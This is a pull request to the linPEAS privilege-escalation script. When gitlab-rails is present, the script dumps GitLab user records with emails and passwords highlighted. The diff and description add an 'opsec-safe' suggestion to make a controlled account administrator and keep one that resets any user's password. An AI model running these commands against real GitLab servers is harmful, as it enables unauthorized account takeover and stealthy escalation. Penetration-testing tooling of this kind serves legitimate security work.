### PR TITLE
Add opsec-safe privesc suggestion for 'gitlab-rails'

### DIFF
--- a/linPEAS/linpeas.sh
+++ b/linPEAS/linpeas.sh
@@ -2300,7 +2300,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
   if [ "`which gitlab-rails`" ]; then
     echo "gitlab-rails was found. Trying to dump users..."
     gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -E "s,email|password,${C}[1;31m&${C}[0m,"
-    echo "If you have enough privileges, you can change the password of any user running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'"
+    echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'"
+    echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'"
     echo ""
   fi
   if [ "`which gitlab-backup`" ]; then


### PR DESCRIPTION
LinPEAS recently added functionality to identify if Gitlab is running and provide suggestions to escalate within Gitlab. The current suggestion if `gitlab-rails` is identified is as follows.

```
If you have enough privileges, you can change the password of any user running: gitlab-rails runner 'user = User.find_by(email: "admin@example.com"); user.password = "pass_peass_pass"; user.password_confirmation = "pass_peass_pass"; user.save!'
```

However, changing a user's password is intrusive and should not be the main suggestion for privesc. This pull request retains the suggestion, but adds one that is easier, less intrusive, and more opsec-safe, i.e. making an existing user account under your control administrator.

```
If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: "youruser@example.com"); user.admin = TRUE; user.save!'
Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: "admin@example.com"); user.password = "pass_peass_pass"; user.password_confirmation = "pass_peass_pass"; user.save!'
```

**For consideration**: instead of identifying users by email, the syntax could be simplified by selecting users by their username (which is assumed to be more broadly available), by changing the first line of both suggestions to the following.

```
user = User.find_by_username 'username'
```